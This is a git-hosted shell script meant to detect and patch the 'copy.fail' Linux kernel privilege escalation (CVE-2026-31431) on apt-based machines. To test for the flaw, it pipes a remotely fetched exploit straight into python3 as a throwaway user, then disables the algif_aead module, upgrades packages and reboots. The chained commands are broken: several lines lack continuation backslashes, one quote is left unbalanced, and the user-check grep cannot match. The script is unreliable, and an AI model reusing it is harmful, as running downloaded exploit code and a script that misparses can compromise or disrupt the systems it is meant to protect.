corwin/sysmisc
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
sysmisc/fix-copy-fail.sh
corwin 12a47659f7 reference website, add set -x 
Thanks to #emacs user kiliro for suggesting it would be wise to mention https://copy.fail in the script that detects and attempts to patch for it.  Change will add some meaningful top-natter, improve other comments, say thanks, enable command logging while the script runs.
2026-04-30 13:45:36 -05:00

57 lines
2.4 KiB
Bash
Raw Blame History

#!/usr/bin/sh
# fix-copy-fail.sh - harden vs CVE-2026-31431, see: https://copy.fail
# Copyright (c) 2026 Corwin Brust <corwin@bru.st>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
#
# According to the website https://copy.fail (20262431@1pZ-5)
# CVE-2026-31431 enables privlage escalation via exploitation
# of a defect in the linux kernel intended to support a rarely
# used (but typically enabled) kernel model, "algif_aead".
#
# This script grew from walking several dozen apt(1) virtual machines
# and beneifited greatly from "peer" review and/or comments from the
# FSF SYSOPS, irc://libera.chat/#emacs and other nerds/activists. thx
#
# more output. output is good.
set -x
# Delete the test user if it exists
grep '^testu ' /etc/passwd && deluser testu;
# NOTE: this make the script repeatable however
# it will still abandon the 'testu' account
#
# To remove the test account after patching:
# deluser testu
#
# Note this may not work all in one shot
# due to the exploit screwing with the kernel
# usermap resident in memory.
adduser --disabled-password --gecos='""' testu \
&& su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root \
&& echo "EXPLOIT DETECTED: copy.fail FFI, please see: https://copy.fail" \
&& echo
&& echo "The system MUST be restarted before confirming the fix."
&& echo "If changes are made this should happen automatically but do it manually if that fails."
&& echo
&& echo "Pausing for ten seconds before attempting to fix..""
&& sleep 10 \
&& echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf \
&& rmmod algif_aead \
&& apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y && shutdown -r now \
|| echo "Check halted: check above for error messages.\n" \
"If the only error message you see if from grep you patched for copy.fail."
Reference in a new issue View git blame Copy permalink